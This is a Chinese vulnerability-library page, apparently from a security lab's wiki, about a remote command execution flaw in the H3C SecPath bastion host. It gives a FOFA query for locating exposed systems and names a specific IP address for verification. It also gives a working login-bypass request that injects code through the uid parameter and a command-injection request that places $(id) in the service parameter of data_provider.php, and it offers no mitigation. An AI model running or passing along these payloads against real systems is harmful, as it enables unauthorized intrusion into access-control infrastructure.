H3C SecParh堡垒机远程命令执行漏洞–xxlm-漏洞文库小世界-安全文库-NGC660安全实验室

H3C SecParh堡垒机远程命令执行漏洞–xxlm

漏洞描述

   H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令,漏洞类似于齐治堡垒机

影响范围

    H3C SecParh堡垒机

漏洞验证

    fofa搜索app="H3C-SecPath-运维审计系统"

1625733554438-47e6af9d-09d6-468e-8068-cae275a244e4

https://222.222.227.17:8888/ 进行验证
首先通过任意用户登录获取Cookie

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin 

1625733554303-5c4560e4-f4f1-470e-8234-a8c70f26d9f3

命令执行payload:(id–>command)

/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true 

可成功执行系统命令

1625733554375-6556fedb-566a-4852-ad4d-688211958bfd

参考连接

https://icode9.com/content-1-1048607.html

请登录后发表评论

    请登录后查看回复内容